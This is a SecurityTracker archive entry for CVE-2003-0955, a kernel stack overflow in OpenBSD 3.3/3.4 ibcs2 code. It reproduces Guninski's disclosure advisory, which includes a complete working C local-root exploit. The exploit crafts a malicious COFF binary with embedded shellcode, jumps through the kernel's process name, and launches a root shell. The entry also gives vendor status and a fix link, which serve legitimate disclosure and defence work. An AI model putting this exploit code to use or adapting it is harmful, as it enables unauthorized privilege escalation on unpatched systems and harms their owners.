SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (UNIX)  >   OpenBSD Kernel Vendors:   OpenBSD
OpenBSD Kernel ibcs Overflow Yields Root Privileges to Local Users
SecurityTracker Alert ID:  1008214
SecurityTracker URL:  http://securitytracker.com/id/1008214
CVE Reference:   CVE-2003-0955   (Links to External Site)
Updated:  Nov 24 2003
Original Entry Date:  Nov 17 2003
Impact:   Execution of arbitrary code via local system, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Tested on 3.3, 3.4
Description:   A buffer overflow vulnerability was reported in the OpenBSD kernel. A local user can execute arbitrary code to gain root privileges.

Georgi Guninski reported that there is a stack based kernel overflow in OpenBSD in the 'ibcs2_exec.c'.

A demonstration exploit is provided in the Source Message and in the original advisory.

The original advisory is available at:

http://www.guninski.com/msuxobsd2.html

The vendor was reportedly notified on November 15, 2003.

Impact:   A local user can execute arbitrary code with kernel privileges.
Solution:   The vendor has released a fix for OpenBSD 3.4, available via CVS at:

http://www.openbsd.org/cgi-bin/cvsweb/src/sys/compat/ibcs2/ibcs2_exec.c.diff?r1=1.14.6.1&r2=1.14.6.2

Fixes for earlier versions will reportedly be made available shortly.

Vendor URL:  www.openbsd.org/ (Links to External Site)
Cause:   Boundary error

Message History:   This archive entry has one or more follow-up message(s) listed below.
Nov 19 2003 (OpenBSD Issues Fix for 3.3) OpenBSD Kernel ibcs Overflow Yields Root Privileges to Local Users
A fix is available for both OpenBSD 3.3 and 3.4.



 Source Message Contents

Subject:  [Full-Disclosure] OpenBSD kernel overflow, yet still *BSD much better than windows


Georgi Guninski security advisory #64, 2003

OpenBSD kernel overflow, yet still *BSD much better than windows

Please help Liu!
Liu disclosed 13 explorer bugs on one day and now needs a computer of his own.
Please donate at: http://clik.to/donatepc
"The less that you give, you're a taker" 
-- Black Sabbath, http://www.lyricsfreak.com/b/black-sabbath/19364.html


Systems affected:
tested on OpenBSD 3.3 and 3.4, probably other versions also affected


Risk: Medium
Date: 17 November 2003

Legal Notice:
This Advisory is Copyright (c) 2003 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/msuxobsd2.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:

There is a stack based kernel overflow in OpenBSD 3.3,3.4 probably earlier 
in ibcs2 code. Exploit code is available for 3.3. On 3.4 the kernel is 
paniced with smashed stack, ease of exploitation is currently unknown.

Details:
The problem is in:
"ibcs2_exec.c" line 427 of 738
	char buf[128], *bufp;	
	int len = sh.s_size, path_index, entry_len;
		
	error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf,
				len, sh.s_scnptr,
				UIO_SYSSPACE, IO_NODELOCKED, p->p_ucred,
				&resid, p);

len is taken from the binary and is used for copying in stack based buffer 
which is wrong.

Oh, I forgot.
Please help Liu!
Liu disclosed 13 explorer bugs on one day and now needs a computer of his own.
Please donate at: http://clik.to/donatepc
"The less that you give, you're a taker" 
-- Black Sabbath, http://www.lyricsfreak.com/b/black-sabbath/19364.html

--msuxobsd2.c---------------------------------

/*
Legal Notice:
This Advisory is Copyright (c) 2003 Georgi Guninski.
This program cannot be used in "vulnerabilities databases" and 
securityfocus, microsoft, cert and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/msuxobsd2.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/signal.h>
#include <sys/utsname.h>
#include <sys/stat.h>
#include "/usr/src/sys/compat/ibcs2/ibcs2_exec.h"

// some code taken from noir article from phrack 60

void
get_proc(pid_t pid, struct kinfo_proc *kp)
{
   u_int arr[4], len;

        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
                perror("sysctl");
                fprintf(stderr, "this is an unexpected error, rerun!\n");
                exit(-1);
        }

}
int msux()
{
int fd;
struct coff_filehdr cf;
struct coff_aouthdr ca;
struct coff_scnhdr s1,s2,s3;
int exe[512];
char fil[]="/tmp/vvc";
int v;
unsigned int initpid=0xe7610000;
unsigned int reta=0xe770fc8c;//0xe770bc68; //0xe7719c64;//0xe770bc64;
struct kinfo_proc kp;
long ppid,mypid;
int p,st;

get_proc((pid_t) getppid(), &kp);

ppid=(u_long) kp.kp_eproc.e_paddr;

get_proc((pid_t) getpid(), &kp);
mypid=(u_long) kp.kp_eproc.e_paddr;

// address of kernel's p_comm for 3.3
reta=0x10f+(u_long) kp.kp_eproc.e_paddr; 

printf("ppid=%x mypid=%x %reta=%x\n",ppid,mypid,reta);
fd=open(fil,O_CREAT|O_RDWR,0700);
if (fd==-1) {perror("open");return 1;}
memset(&cf,0,sizeof(cf));
memset(&ca,0,sizeof(ca));
memset(&s1,0,sizeof(s1));
memset(&s2,0,sizeof(s2));
memset(&s3,0,sizeof(s3));
//memset(exe,0xe7,sizeof(exe));
for(v=0;v<sizeof(exe)/sizeof(int);v++) {exe[v]= 0xbabe0000 + v; /*0xcafebabe;*/}
exe[2]=ppid; // to avoid an early crash
exe[1]=reta; // return address

p=st=3; //0xd;

exe[p++]=0xfebabeb9; // shell code
exe[p++]=0x10598bca;
exe[p++]=0x4389c031;
exe[p++]=0x89138b04;
exe[p++]=0x90900442;

*(int*)((int)&exe[st]+1) = ppid;

exe[p++]=0xbabeb850; // call exit1 to return in userland
exe[p++]=0xb850cafe;
exe[p++]=0xd01c59b8;
exe[p++]=0x9090d0ff;

*(int*)((int)&exe[st]+2+5*4) = mypid;

cf.f_magic = COFF_MAGIC_I386 ;
cf.f_nscns=3;
ca.a_magic = COFF_ZMAGIC;
s1.s_flags = COFF_STYP_TEXT;
s2.s_flags = COFF_STYP_DATA;
s3.s_flags = COFF_STYP_SHLIB;
s3.s_size= 128+12*4 + 30*4; //sizeof(exe);
write(fd,&cf,sizeof(cf));
write(fd,&ca,sizeof(ca));
write(fd,&s1,sizeof(s1));
write(fd,&s2,sizeof(s2));
write(fd,&s3,sizeof(s3));
write(fd,exe,sizeof(exe));
printf("Now exec %s\n",fil);
execl(fil,0);
exit(42); // should not be reached if successfull
}

int main(int ac,char **av)
{
uid_t ui;
// this is kernel's p_comm. we first jump here.
char goodfile[]="\x54\x58\x40\x40\x40\x40\xff\xd0";
char tmp[1000];

if (strcmp(av[0],goodfile)) 
	{
	snprintf(tmp,sizeof(tmp),"cp %s \"%s\"",av[0],goodfile);
	system(tmp);execl(goodfile,goodfile,0);
	return 42; //should not be reached
	}
printf("written by georgi\n");
printf("\nPlease help Liu - http://clik.to/donatepc\n\n");
fflush(stdout);
#define SWEETDREAM 2 

if(!fork()) msux();
while(42)
{
sleep(SWEETDREAM);
ui=getuid();
printf("uid=%x\n",ui);
if (ui==0) execl("/bin/sh",0);
}
return 42;
}


----------------------------------------------

Vendor status:
OpenBSD was notified on Sat, 15 Nov 2003 17:57:33 +0200.
Fix: available in cvs for 3.4:
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/compat/ibcs2/ibcs2_exec.c.diff?r1=1.14.6.1&r2=1.14.6.2 
For earlier versions should be available shortly.

Regards,
Georgi Guninski
http://www.guninski.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC